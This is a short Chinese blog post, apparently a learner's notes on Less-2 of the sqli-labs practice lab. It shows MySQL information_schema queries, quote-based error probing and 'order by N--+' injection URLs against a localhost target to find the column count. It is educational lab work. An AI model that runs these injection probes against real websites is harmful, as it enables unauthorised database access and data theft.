lili‘s sqli-labs less02(小猪崽有新发现)

这篇博客详细记录了作者在安全测试中对SQL注入漏洞的探索,通过对比Less01和Less02两个测试案例,展示了不同的注入手法,如在查询语句后加单引号、使用orderby语句等,揭示了数据库查询的潜在风险,并分享了测试流程和错误判断方法。
摘要由CSDN通过智能技术生成

今天拿到驾照啦~就很快落o! 没想到我这么胆小的又呆头鹅人也可以拿到(●ˇ∀ˇ●)!!因为疫情原因在学校被封闭了好久,导致战线拉得很长别人都是四十天我是四个月诶╥﹏╥... 但!!结果总归是好的,这是②〇②①年的第一个证书了(●'◡'●)

突然惊奇的发现less01和less02的测试流程好像欸~

一.复习MySQL常见查询语句

select table_name from information_schema.tables where table_schema = 'security';

select column_name from information_schema.columns where table_name = 'users';

select id,username,password from security.users;

二.输入语句进行测试

1.

在文本框中语句后加 '

根据显示的错误,判断存在基本的注入漏洞

和第一关的区别是:第一关是select * from user where id = '$传参'(图见上一篇less01https://blog.csdn.net/DebbieLi_Ca/article/details/113575635);第二关是select * from user where id = $传参

2.使用order by语句查询(和less01的差别是在id值后面没有了’  因为传值方式不同)

http://localhost/sqli-labs-master/Less-2/?id=1 order by 1--+

http://localhost/sqli-labs-master/Less-2/?id=1 order by 2--+

http://localhost/sqli-labs-master/Less-2/?id=1 order by 3--+

http://localhost/sqli-labs-master/Less-2/?id=1 order by 4--+时报错说明只有三列

(order by具体用法见https://blog.csdn.net/DebbieLi_Ca/article/details/113575635

 3.其余测试参照less01步骤

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值